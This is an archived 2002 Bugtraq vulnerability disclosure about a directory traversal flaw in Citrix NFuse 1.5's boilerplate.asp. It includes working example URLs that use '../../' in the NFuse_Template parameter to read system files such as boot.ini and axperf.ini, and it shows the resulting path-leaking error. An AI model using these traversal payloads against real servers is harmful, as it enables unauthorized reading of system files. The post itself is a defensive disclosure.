[24859] in bugtraq
Citrix Nfuse directory traversal with boilerplate.asp
daemon@ATHENA.MIT.EDU (Eric Budke)
Thu Mar 28 10:30:20 2002
Message-Id: <5.1.0.14.2.20020320170030.02ab3158@pop.panix.com>
Date: Wed, 27 Mar 2002 16:26:36 -0500
To: bugtraq@securityfocus.com
From: Eric Budke <budke@budke.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
This vulnerability is based on being an authenticated user (as opposed to a
prior bug someone put out for an unauthenticated users).
Disclaimer:
My ability to find a resource at Citrix via their web site was not
successful, thus the post here. They have been notified thanks to some
contacts forwarded from people on Bugtraq.
Given that you must be authenticated first, one assumes that you have some
minimal level of trust for the end user, so the severity isn't that high.
I don't have access to large numbers of systems on which to check this and
to check across multiple versions. This should be reproducible, no guarantees.
Solution: According to Citrix this issue is only in Nfuse 1.5 as the
boilerplate.asp goes away in the most recent version. Assuming one
upgrades, this and a number of other non-public (from what I can gather
from Citrix) vulnerabilities go away. I don't have the facilities to test
on the latest version, and for all I know something similar can be done
there. Citrix has been notified, their solution was to upgrade.
A command such as:
http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica
Can be replaced with one like this:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
It seems to work with things in winnt and winnt/system32, it doesn't seem
to like things back on the c:\ which gives up its very minor vuln of the
path of wwwroot.
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
Gives up:
There was an error:The Citrix HTML template specified does not exist or
could not be accessed. The template file specified was:
c:\inetpub\wwwroot\../../boot.ini
Nice but lacking much use. So it seems we have another directory traversal
issue.
Credits: Professionally I work for Foundstone (www.foundstone.com). This
wouldn't have been found w/o a client engagement through them.
